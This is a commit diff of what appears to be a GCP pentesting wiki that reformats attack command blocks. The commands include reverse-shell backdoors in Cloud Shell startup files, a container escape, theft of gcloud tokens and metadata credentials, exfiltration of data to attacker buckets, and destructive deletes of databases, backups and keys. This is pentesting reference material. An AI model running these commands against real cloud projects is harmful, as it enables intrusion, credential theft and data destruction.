This commit is contained in:
carlospolop
2025-11-22 19:35:20 +01:00
parent 75115ef884
commit 6cd2d68471
52 changed files with 2110 additions and 152 deletions

View File

@@ -101,7 +101,6 @@
- [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
- [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
- [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
- [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
- [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
- [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
- [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
@@ -132,6 +131,7 @@
- [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md)
- [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
- [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md)
- [GCP - Vertex AI Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md)
- [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md)
- [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md)
- [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md)
@@ -188,6 +188,7 @@
- [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
- [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
- [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
- [GCP - Vertex AI Enum](pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md)
- [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
- [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
- [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)

View File

@@ -16,6 +16,10 @@ For more information about Bigtable check:
Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
<details>
<summary>Create stealth app profile</summary>
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
@@ -26,6 +30,8 @@ gcloud bigtable app-profiles update stealth-profile \
--data-boost-compute-billing-owner=HOST_PAYS
```
</details>
As long as this profile exists you can reconnect using fresh credentials that reference it.
### Maintain your own replica cluster
@@ -34,11 +40,17 @@ As long as this profile exists you can reconnect using fresh credentials that re
Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
<details>
<summary>Create replica cluster</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
</details>
Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
### Lock replication behind your own CMEK
@@ -47,12 +59,18 @@ Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instan
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
<details>
<summary>Create CMEK-protected cluster</summary>
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
</details>
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -24,18 +24,30 @@ This console has some interesting capabilities for attackers:
This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
<details>
<summary>Add reverse shell to .bashrc</summary>
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
</details>
There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
<details>
<summary>Create .customize_environment backdoor</summary>
```bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
```
</details>
> [!WARNING]
> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
@@ -45,11 +57,17 @@ This is the pop-up from executing `gcloud projects list` from the cloud shell (a
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
<details>
<summary>Get access tokens from Cloud Shell</summary>
```bash
gcloud auth print-access-token
gcloud auth application-default print-access-token
```
</details>
#### How the SSH connection is stablished
Basically, these 3 API calls are used:

View File

@@ -8,6 +8,10 @@
Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
<details>
<summary>Create Dataflow flex template with backdoor</summary>
```bash
git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
cd python-docs-samples/dataflow/flex-templates/getting_started
@@ -38,10 +42,16 @@ gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
--region=us-central1
```
</details>
**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
Then, next time the job is executed, the compromised container built will be run:
<details>
<summary>Run Dataflow template</summary>
```bash
# Run template
gcloud dataflow $NAME_TEMPLATE run testing \
@@ -50,6 +60,8 @@ gcloud dataflow $NAME_TEMPLATE run testing \
--region=us-central1
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,10 +14,16 @@ Find more information about Logging in:
Create a sink to exfiltrate the logs to an attackers accessible destination:
<details>
<summary>Create logging sink</summary>
```bash
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -6,10 +6,16 @@
To get the **current token** of a user you can run:
<details>
<summary>Get access token from SQLite database</summary>
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
</details>
Check in this page how to **directly use this token using gcloud**:
{{#ref}}
@@ -18,18 +24,30 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
To get the details to **generate a new access token** run:
<details>
<summary>Get refresh token from SQLite database</summary>
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
</details>
It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
<details>
<summary>Get new access token using refresh token</summary>
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
</details>
The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire:
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
@@ -51,12 +69,22 @@ Then, gcloud will use the state and code with a some hardcoded `client_id` (`325
You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
<details>
<summary>Get all Google OAuth scopes</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
</details>
It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
<details>
<summary>Test supported scopes for gcloud</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
@@ -67,6 +95,8 @@ curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE
done
```
</details>
After executing it it was checked that this app supports these scopes:
```

View File

@@ -14,6 +14,10 @@ For more information about Cloud Storage check:
You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
<details>
<summary>Create and use HMAC key for Storage access</summary>
```bash
# Create key
gsutil hmac create <sa-email>
@@ -25,6 +29,8 @@ gsutil config -a
gsutil ls gs://[BUCKET_NAME]
```
</details>
Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### Give Public Access

View File

@@ -28,10 +28,16 @@ With these permissions it's possible to:
With this permission it's possible to **see the logs of the App**:
<details>
<summary>Tail app logs</summary>
```bash
gcloud app logs tail -s <name>
```
</details>
### Read Source Code
The source code of all the versions and services are **stored in the bucket** with the name **`staging.<proj-id>.appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.

View File

@@ -13,9 +13,15 @@ For more information about Bigtable check:
> [!TIP]
> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
>
> <details>
>
> <summary>Install cbt CLI</summary>
>
> ```bash
> gcloud components install cbt
> ```
>
> </details>
### Read rows
@@ -23,21 +29,31 @@ For more information about Bigtable check:
`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.
<details>
<summary>Read Bigtable entries</summary>
```bash
# Install cbt
gcloud components update
gcloud components install cbt
# Read entries with creds of gcloud
# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
</details>
### Write rows
**Permissions:** `bigtable.tables.mutateRows`, (you will need `bigtable.tables.readRows` to confirm the change).
Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
<details>
<summary>Inject malicious row</summary>
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
@@ -48,6 +64,8 @@ cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 prof
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
```
</details>
`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
### Dump rows to your bucket
@@ -59,6 +77,10 @@ It's possible to exfiltrate the contents of an entire table to a bucket controll
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
<details>
<summary>Export Bigtable to GCS bucket</summary>
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
@@ -76,6 +98,8 @@ gcloud dataflow jobs run dump-bigtable3 \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
</details>
> [!NOTE]
> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
@@ -90,6 +114,10 @@ It's possible to import the contents of an entire table from a bucket controlled
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
<details>
<summary>Import from GCS bucket to Bigtable</summary>
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
@@ -107,12 +135,18 @@ gcloud dataflow jobs run import-bt-$(date +%s) \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
</details>
### Restoring backups
**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.
An attacker with these permissions can restore a bakcup into a new table under his control in order to be able to recover old sensitive data.
<details>
<summary>Restore Bigtable backup</summary>
```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
--cluster=<CLUSTER_ID_SOURCE>
@@ -125,6 +159,8 @@ gcloud bigtable instances tables restore \
--project=<PROJECT_ID_DESTINATION>
```
</details>
### Undelete tables
**Permissions:** `bigtable.tables.undelete`
@@ -136,6 +172,10 @@ This is particularly useful for:
- Accessing historical data that was intentionally purged
- Reversing accidental or malicious deletions to maintain persistence
<details>
<summary>Undelete Bigtable table</summary>
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
@@ -146,6 +186,8 @@ gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```
</details>
> [!NOTE]
> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.
@@ -159,6 +201,10 @@ Authorized views let you present a curated subset of the table. Instead of respe
> [!WARNING]
> The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaiing any extra permission, therefore this technique is mostly useless.
<details>
<summary>Create authorized view</summary>
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
@@ -182,6 +228,8 @@ gcloud bigtable authorized-views add-iam-policy-binding card-dump \
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```
</details>
Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.
### Read Authorized Views
@@ -190,6 +238,9 @@ Because access is scoped to the view, defenders often overlook the fact that you
If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will be probalby limiting what you can access from the table. Below is an example using Python:
<details>
<summary>Read from authorized view (Python)</summary>
```python
from google.cloud import bigtable
@@ -226,6 +277,8 @@ for response in rows:
print(f" {family}:{qualifier} = {value}")
```
</details>
### Denial of Service via Delete Operations
**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
@@ -240,6 +293,10 @@ Any of the Bigtable delete permissions can be weaponized for denial of service a
- **`bigtable.instances.delete`**: Remove complete Bigtable instances, wiping out all tables and configurations
- **`bigtable.tables.delete`**: Delete individual tables, causing data loss and application failures
<details>
<summary>Delete Bigtable resources</summary>
```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
@@ -265,6 +322,8 @@ gcloud bigtable clusters delete <cluster-id> \
gcloud bigtable instances delete <instance-id>
```
</details>
> [!WARNING]
> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.

View File

@@ -14,6 +14,10 @@ For more information about Cloud Build check:
With this permission you can approve the execution of a **codebuild that require approvals**.
<details>
<summary>Approve Cloud Build execution</summary>
```bash
# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
curl -X POST \
@@ -26,6 +30,8 @@ curl -X POST \
"https://cloudbuild.googleapis.com/v1/projects/<PROJECT_ID>/locations/<LOCATION>/builds/<BUILD_ID>:approve"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ Find some information about Cloud Functions in:
With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:
<details>
<summary>Get signed URL for source code download</summary>
```bash
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
@@ -21,6 +25,8 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca
-d '{}'
```
</details>
### Steal Cloud Function Requests
If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.
@@ -29,6 +35,10 @@ Moreover, Cloud Functions running in python use **flask** to expose the web serv
For example this code implements the attack:
<details>
<summary>Steal Cloud Function requests (Python injection)</summary>
```python
import functions_framework
@@ -126,6 +136,8 @@ def injection():
return str(e)
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ For more information about Cloud Shell check:
Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing:
<details>
<summary>Container escape commands</summary>
```bash
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
@@ -21,18 +25,30 @@ sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
```
</details>
This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.
Moreover, notice that from the host you can find a service account token:
<details>
<summary>Get service account from metadata</summary>
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```
</details>
With the following scopes:
<details>
<summary>Get service account scopes</summary>
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
@@ -41,26 +57,44 @@ https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```
</details>
Enumerate metadata with LinPEAS:
<details>
<summary>Enumerate metadata with LinPEAS</summary>
```bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
```
</details>
After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**...
### Use it as Proxy
If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):
<details>
<summary>Install Squid proxy</summary>
```bash
sudo apt install -y squid
```
</details>
Just for let you know Squid is a http proxy server. Create a **squid.conf** file with the following settings:
<details>
<summary>Create squid.conf file</summary>
```bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
@@ -68,28 +102,52 @@ acl all src 0.0.0.0/0
http_access allow all
```
</details>
copy the **squid.conf** file to **/etc/squid**
<details>
<summary>Copy config to /etc/squid</summary>
```bash
sudo cp squid.conf /etc/squid
```
</details>
Finally run the squid service:
<details>
<summary>Start Squid service</summary>
```bash
sudo service squid start
```
</details>
Use ngrok to let the proxy be available from outside:
<details>
<summary>Expose proxy with ngrok</summary>
```bash
./ngrok tcp 3128
```
</details>
After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).
For better use at startup the .bashrc file should have the following lines:
<details>
<summary>Add to .bashrc for automatic startup</summary>
```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
@@ -97,6 +155,8 @@ sudo service squid start
cd ngrok;./ngrok tcp 3128
```
</details>
The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ For more information about Cloud SQL check:
To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.
<details>
<summary>Allow your IP and connect to database</summary>
```bash
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
@@ -27,6 +31,8 @@ mysql -h <ip_db> # If mysql
gcloud sql connect mysql --user=root --quiet
```
</details>
It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.
As these are the requirements I'm not completely sure what are the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** for. If you know it send a PR!
@@ -35,71 +41,119 @@ As these are the requirements I'm not completely sure what are the permissions *
Get a **list of all the users** of the database:
<details>
<summary>List database users</summary>
```bash
gcloud sql users list --instance <intance-name>
```
</details>
### `cloudsql.users.create`
This permission allows to **create a new user inside** the database:
<details>
<summary>Create database user</summary>
```bash
gcloud sql users create <username> --instance <instance-name> --password <password>
```
</details>
### `cloudsql.users.update`
This permission allows to **update user inside** the database. For example, you could change its password:
<details>
<summary>Update user password</summary>
```bash
gcloud sql users set-password <username> --instance <instance-name> --password <password>
```
</details>
### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
Backups might contain **old sensitive information**, so it's interesting to check them.\
**Restore a backup** inside a database:
<details>
<summary>Restore database backup</summary>
```bash
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
```
</details>
To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
### `cloudsql.backupRuns.delete`
This permission allow to delete backups:
<details>
<summary>Delete backup</summary>
```bash
gcloud sql backups delete <backup-id> --instance <instance-id>
```
</details>
### `cloudsql.instances.export`, `storage.objects.create`
**Export a database** to a Cloud Storage Bucket so you can access it from there:
<details>
<summary>Export database to bucket</summary>
```bash
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
```
</details>
### `cloudsql.instances.import`, `storage.objects.get`
**Import a database** (overwrite) from a Cloud Storage Bucket:
<details>
<summary>Import database from bucket</summary>
```bash
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
```
</details>
### `cloudsql.databases.delete`
Delete a database from the db instance:
<details>
<summary>Delete database</summary>
```bash
gcloud sql databases delete <db-name> --instance <instance-id>
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -16,11 +16,17 @@ This would allow an attacker to **access the data contained inside already exist
It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
<details>
<summary>Export and download VM image</summary>
```bash
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally
```
</details>
Fore performing this action the attacker might need privileges over the storage bucket and for sure **privileges over cloudbuild** as it's the **service** which is going to be asked to perform the export\
Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.\
The cloudbuild SA `<project-id>@cloudbuild.gserviceaccount.com` needs:
@@ -38,6 +44,10 @@ And the SA `<project-id>-compute@developer.gserviceaccount.com` needs:
It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot in a disk, a disk in an image** and following the **previous section**, export that image to inspect it locally
<details>
<summary>Create disk from snapshot and image from disk</summary>
```bash
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
@@ -46,18 +56,30 @@ gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
```
</details>
### Inspect an Image creating a VM
With the goal of accessing the **data stored in an image** or inside a **running VM** from where an attacker **has created an image,** it possible to grant an external account access over the image:
<details>
<summary>Grant access to image and create VM</summary>
```bash
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
```
</details>
and then create a new VM from it:
<details>
<summary>Create VM instance from image</summary>
```bash
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
@@ -65,55 +87,93 @@ gcloud compute instances create [INSTANCE_NAME] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
```
</details>
If you could not give your external account access over image, you could launch a VM using that image in the victims project and **make the metadata execute a reverse shell** to access the image adding the param:
<details>
<summary>Create VM with reverse shell in metadata</summary>
```bash
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
```
</details>
### Inspect a Snapshot/Disk attaching it to a VM
With the goal of accessing the **data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.**
Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
<details>
<summary>Grant access to disk</summary>
```bash
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
```
</details>
**Attach the disk** to an instance:
<details>
<summary>Attach disk to instance</summary>
```bash
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
```
</details>
Mount the disk inside the VM:
1. **SSH into the VM**:
<details>
<summary>SSH into VM and mount disk</summary>
```sh
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
```
</details>
2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
3. **Format and Mount the Disk** (if it's a new or raw disk):
- Create a mount point:
<details>
<summary>Create mount point and mount</summary>
```sh
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```
</details>
- Mount the disk:
<details>
<summary>Mount disk device</summary>
```sh
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```
</details>
If you **cannot give access to a external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**.

View File

@@ -14,6 +14,10 @@ For more information about Filestore check:
A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:
<details>
<summary>Mount Filestore filesystem</summary>
```bash
sudo apt-get update
sudo apt-get install nfs-common
@@ -24,6 +28,8 @@ mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
```
</details>
To find the IP address of a filestore insatnce check the enumeration section of the page:
{{#ref}}
@@ -34,6 +40,10 @@ To find the IP address of a filestore insatnce check the enumeration section of
If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:
<details>
<summary>Update Filestore instance to allow access</summary>
```bash
gcloud filestore instances update nfstest \
--zone=<exact-zone> \
@@ -60,10 +70,16 @@ gcloud filestore instances update nfstest \
}
```
</details>
### Restore a backup
If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
<details>
<summary>Create new instance and restore backup</summary>
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
@@ -82,10 +98,16 @@ gcloud filestore instances restore <new-instance-name> \
# Follow the previous section commands to mount it
```
</details>
### Create a backup and restore it
If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
<details>
<summary>Create backup and restore in new instance</summary>
```bash
# Create share backup
gcloud filestore backups create <back-name> \
@@ -97,6 +119,8 @@ gcloud filestore backups create <back-name> \
# Follow the previous section commands to restore it and mount it
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,10 +18,16 @@ To **grant** the primitive role of **Owner** to a generic "@gmail.com" account,
You can use the following command to **grant a user the primitive role of Editor** to your existing project:
<details>
<summary>Grant Editor role to user</summary>
```bash
gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
```
</details>
If you succeeded here, try **accessing the web interface** and exploring from there.
This is the **highest level you can assign using the gcloud tool**.

View File

@@ -14,6 +14,10 @@ Find basic information about KMS in:
An attacker with this permission could destroy a KMS version. In order to do this you first need to disable the key and then destroy it:
<details>
<summary>Disable and destroy key version (Python)</summary>
```python
# pip install google-cloud-kms
@@ -59,6 +63,8 @@ disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
```
</details>
### KMS Ransomware
In AWS it's possible to completely **steal a KMS key** by modifying the KMS resource policy and only allowing the attackers account to use the key. As these resource policies doesn't exist in GCP this is not possible.
@@ -78,6 +84,10 @@ gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_
#### Here are the steps to import a new version and disable/delete the older data:
<details>
<summary>Import new key version and delete old version</summary>
```bash
# Encrypt something with the original key
echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
@@ -152,8 +162,14 @@ gcloud kms keys versions destroy \
```
</details>
### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
<details>
<summary>Encrypt data with symmetric key (Python)</summary>
```python
